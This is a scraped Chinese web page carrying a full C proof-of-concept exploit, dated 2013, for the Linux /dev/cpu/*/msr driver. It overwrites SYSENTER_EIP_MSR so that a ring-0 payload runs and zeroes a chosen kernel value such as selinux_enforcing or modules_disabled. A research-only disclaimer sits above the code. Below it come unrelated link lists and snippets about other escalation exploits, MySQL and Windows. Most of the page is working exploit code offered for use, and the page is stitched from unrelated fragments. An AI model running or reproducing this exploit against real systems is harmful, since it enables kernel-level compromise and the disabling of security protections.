本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  1. // PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host
  2. // can do whatever in the commented area, re-enable module support, etc
  3. // requires CONFIG_X86_MSR and just uid 0
  4. // a small race exists between the time when the MSR is written to the first
  5. // time and when we issue our sysenter
  6. // we additionally require CAP_SYS_NICE to make the race win nearly guaranteed
  7. // configured to take a hex arg of a dword pointer to set to 0
  8. // (modules_disabled, selinux_enforcing, take your pick)
  9. //
  10. // Hello to Red Hat, who has shown yet again to not care until a
  11. // public exploit is released. Not even a bugtraq entry existed in
  12. // their system until this was published -- and they have a paid team
  13. // of how many?
  14. // It's not as if I didn't mention the problem and existence of an easy
  15. // exploit multiple times prior:
  16. // https://twitter.com/grsecurity/status/298977370776432640
  17. // https://twitter.com/grsecurity/status/297365303095078912
  18. // https://twitter.com/grsecurity/status/297189488638181376
  19. // https://twitter.com/grsecurity/status/297030133628416000
  20. // https://twitter.com/grsecurity/status/297029470072745984
  21. // https://twitter.com/grsecurity/status/297028324134359041
  22. //
  23. // spender 2013
  24. #define _GNU_SOURCE
  25. #include<stdio.h>
  26. #include<sched.h>
  27. #include<unistd.h>
  28. #include<sys/types.h>
  29. #include<sys/stat.h>
  30. #include<fcntl.h>
  31. #include<stdlib.h>
  32. #include<sys/time.h>
  33. #include<sys/resource.h>
  34. #include<sys/mman.h>
  35. #define SYSENTER_EIP_MSR 0x176
  36. u_int64_t msr;
  37. unsignedlong ourstack[65536];
  38. u_int64_t payload_data[16];
  39. externvoid*_ring0;
  40. externvoid*_ring0_end;
  41. void ring0(void)
  42. {
  43. __asm volatile(".globl _ring0\n"
  44. "_ring0:\n"
  45. ".intel_syntax noprefix\n"
  46. ".code64\n"
  47. // set up stack pointer with 'ourstack'
  48. "mov esp, ecx\n"
  49. // save registers, contains the original MSR value
  50. "push rax\n"
  51. "push rbx\n"
  52. "push rcx\n"
  53. "push rdx\n"
  54. // play with the kernel here with interrupts disabled!
  55. "mov rcx, qword ptr [rbx+8]\n"
  56. "test rcx, rcx\n"
  57. "jz skip_write\n"
  58. "mov dword ptr [rcx], 0\n"
  59. "skip_write:\n"
  60. // restore MSR value before returning
  61. "mov ecx, 0x176\n"// SYSENTER_EIP_MSR
  62. "mov eax, dword ptr [rbx]\n"
  63. "mov edx, dword ptr [rbx+4]\n"
  64. "wrmsr\n"
  65. "pop rdx\n"
  66. "pop rcx\n"
  67. "pop rbx\n"
  68. "pop rax\n"
  69. "sti\n"
  70. "sysexit\n"
  71. ".code32\n"
  72. ".att_syntax prefix\n"
  73. ".global _ring0_end\n"
  74. "_ring0_end:\n"
  75. );
  76. }
  77. unsignedlong saved_stack;
  78. int main(int argc,char*argv[])
  79. {
  80. cpu_set_tset;
  81. int msr_fd;
  82. int ret;
  83. u_int64_t new_msr;
  84. struct sched_param sched;
  85. u_int64_t resolved_addr =0ULL;
  86. if(argc ==2)
  87. resolved_addr = strtoull(argv[1], NULL,16);
  88. /* can do this without privilege */
  89. mlock(_ring0,(unsignedlong)_ring0_end -(unsignedlong)_ring0);
  90. mlock(&payload_data,sizeof(payload_data));
  91. CPU_ZERO(&set);
  92. CPU_SET(0,&set);
  93. sched.sched_priority =99;
  94. ret = sched_setscheduler(0, SCHED_FIFO,&sched);
  95. if(ret){
  96. fprintf(stderr,"Unable to set priority.\n");
  97. exit(1);
  98. }
  99. ret = sched_setaffinity(0,sizeof(cpu_set_t),&set);
  100. if(ret){
  101. fprintf(stderr,"Unable to set affinity.\n");
  102. exit(1);
  103. }
  104. msr_fd = open("/dev/cpu/0/msr", O_RDWR);
  105. if(msr_fd <0){
  106. msr_fd = open("/dev/msr0", O_RDWR);
  107. if(msr_fd <0){
  108. fprintf(stderr,"Unable to open /dev/cpu/0/msr\n");
  109. exit(1);
  110. }
  111. }
  112. lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
  113. ret = read(msr_fd,&msr,sizeof(msr));
  114. if(ret !=sizeof(msr)){
  115. fprintf(stderr,"Unable to read /dev/cpu/0/msr\n");
  116. exit(1);
  117. }
  118. // stuff some addresses in a buffer whose address we
  119. // pass to the "kernel" via register
  120. payload_data[0]= msr;
  121. payload_data[1]= resolved_addr;
  122. printf("Old SYSENTER_EIP_MSR = %016llx\n", msr);
  123. fflush(stdout);
  124. lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
  125. new_msr =(u_int64_t)(unsignedlong)&_ring0;
  126. printf("New SYSENTER_EIP_MSR = %016llx\n", new_msr);
  127. fflush(stdout);
  128. ret = write(msr_fd,&new_msr,sizeof(new_msr));
  129. if(ret !=sizeof(new_msr)){
  130. fprintf(stderr,"Unable to modify /dev/cpu/0/msr\n");
  131. exit(1);
  132. }
  133. __asm volatile(
  134. ".intel_syntax noprefix\n"
  135. ".code32\n"
  136. "mov saved_stack, esp\n"
  137. "lea ecx, ourstack\n"
  138. "lea edx, label2\n"
  139. "lea ebx, payload_data\n"
  140. "sysenter\n"
  141. "label2:\n"
  142. "mov esp, saved_stack\n"
  143. ".att_syntax prefix\n"
  144. );
  145. printf("Success.\n");
  146. return0;
  147. }

Linux Kernel 'MSR' Driver Local Privilege Escalation的更多相关文章

  1. karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

    catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...

  2. CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**  * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC  *  * Vitaly Nikolenko  * http://ha ...

  3. Linux kernel AACRAID Driver Compat IOCTL 本地安全绕过漏洞

    漏洞名称: Linux kernel AACRAID Driver Compat IOCTL 本地安全绕过漏洞 CNNVD编号: CNNVD-201311-390 发布时间: 2013-11-29 更 ...

  4. [转]Mac OS X local privilege escalation (IOBluetoothFamily)

    Source: http://joystick.artificialstudios.org/2014/10/mac-os-x-local-privilege-escalation.html Nowad ...

  5. Linux Kernel ---- PCI Driver 分析

    自己笔记使用. Kernel 版本 4.15.0 (ubuntu 18.04,intel skylake) 最近想学习VGA驱动去了解 DDCCP / EDID 等协议,然后顺便了解下驱动是如何工作的 ...

  6. [EXP]Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)

    #include "stdafx.h" #include <Windows.h> #include "resource.h" void DropRe ...

  7. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

  8. ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728)

    ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728) By Perception Point Resear ...

  9. Linux Kernel - Debug Guide (Linux内核调试指南 )

    http://blog.csdn.net/blizmax6/article/details/6747601 linux内核调试指南 一些前言 作者前言 知识从哪里来 为什么撰写本文档 为什么需要汇编级 ...

随机推荐

  1. windows 环境下mysql 如何修改root密码

    windows 环境下mysql 如何修改root密码 以windows为例: 无法开启服务,将mysql更目录下的data文件夹清空,然后调用 mysqld --initialize 开启mysql ...

  2. int? 参数是这个的时候 是可以传入null的 而int的就不行

    such as     pager.CurrentPageIndex = (page != null ? (int)page : 1);

  3. 测测你适合从事Web前端开发吗

    一般初创的互联网公司最烧钱的时候往往都是刚刚获得风投或融资的时候,因为他们要把钱砸向前端,因为那时候没有客户访问,对于企业来说只有先做好前端技 术.做好客户体验一切才有可能.用户体验做好,才有人访问, ...

  4. listview的动态加载数据问题

    1:调用adapter.notifyDataSetChanged()却不起作用 原因可能有一下几点 1.数据源没有更新,调用notifyDataSetChanged无效. 2.数据源更新了,但是它指向 ...

  5. js正则实现用户输入银行卡号的控制及格式化

    //js正则实现用户输入银行卡号的控制及格式化 <script language="javascript" type="text/javascript"& ...

  6. 用户组,AD域控简介

    “自由”的工作组    工作组(WORK GROUP)就是将不同的电脑按功能分别列入不同的组中,以方便管理.比如在一个网络内,可能有成百上千台工作电脑,如果这些电脑不进行分组,都列在“网上邻居”内,可 ...

  7. 在模型中获取网络数据,刷新tableView

    model .h #import <Foundation/Foundation.h> #import "AFHTTPRequestOperationManager.h" ...

  8. javascript——处理(获取)浏览器版本、操作系统

    javascript——处理(获取)浏览器版本.操作系统 /** * Created by Administrator on 15-1-12. */ function BroswerUtil() { ...

  9. Html禁止粘贴 复制 剪切

    oncopy="return false;" onpaste="return false;" oncut="return false;"

  10. 自动化工具word文档批量转html

    企业有很多的科室,科室的每个人或多或少都会写一些文档,有些文档领导需要浏览,解决的办法是将编辑的文档打印出来,供领导浏览,或是为了节约企业成本,文档就在人与人这间或部门之间copy过来,copy过去. ...